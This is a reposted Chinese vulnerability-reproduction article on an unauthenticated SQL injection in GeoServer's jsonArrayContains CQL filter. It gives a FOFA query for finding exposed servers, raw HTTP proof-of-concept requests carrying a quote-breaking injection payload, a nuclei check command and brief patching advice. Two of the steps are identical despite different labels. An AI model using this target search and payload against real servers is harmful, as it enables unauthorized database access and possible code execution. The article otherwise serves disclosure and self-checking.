漏洞复现|GeoServer-jsonArrayContains-sql注入漏洞

admin 2026-09-10 05:05:45 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: GeoServer存在jsonarraycontainsSQL注入漏洞,攻击者无需认证即可注入恶意SQL,在PostgreSQL且具备sa权限时可实现远程代码执行。文章提供了详细POC复现步骤、nuclei自查方法及修复建议,建议联系厂商升级补丁并部署WAF防护。 综合评分: 72 文章分类: 漏洞分析,web安全,漏洞预警,漏洞poc


漏洞复现 | GeoServer-jsonArrayContains-sql注入漏洞

原创

Tjpan Tjpan

Poc复现

2026年8月30日 11:41 江苏

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

免责声明

「此公众号所分享的网络安全知识、信息及工具皆来源互联网公开收集整理,仅供学习和研究使用,请勿用于非法测试活动。由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,产生的一切后果由读者自行承担,皆与本公众号及文章作者无关、不负任何责任!!!」「如有内容侵权,请联系我们删除处理。谢谢合作!!!」

漏洞概述

攻击者无需任何认证,即可利用该漏洞注入恶意SQL。在数据库为PostgreSQL且拥有sa权限的情况下,可直接实现远程代码执行(RCE)。

影响范围

空间测绘

Fofa

title="geoserver" || app="geoserver"

漏洞复现

Poc

step1 WFS 获取能力接口,获取全部 Feature 图层名称列表

GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate

step2 提取csv数据表字段名

GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=Emodnetbio:mediseh_posidonia_historical_pnt&CQL_FILTER=jsonArrayContains%28%22id%22%2C%27%2Fa%27%2C%27x%27%27%27%29+%3D+true HTTP/1.1
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate

step3 poc 报错注入

GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=Emodnetbio:mediseh_posidonia_historical_pnt&CQL_FILTER=jsonArrayContains%28%22id%22%2C%27%2Fa%27%2C%27x%27%27%27%29+%3D+true HTTP/1.1
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate

漏洞自查

Nuclei

nuclei.exe -u 目标URL -stats -silent -t geoserver-jsonarraycontains-sqli.yaml

修复建议

  • • 建议联系厂商打补丁或升级版本。
  • • 增加Web应用防火墙防护。

关注一下


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:Poc复现 Tjpan Tjpan《漏洞复现 | GeoServer-jsonArrayContains-sql注入漏洞》

评论:0   参与:  0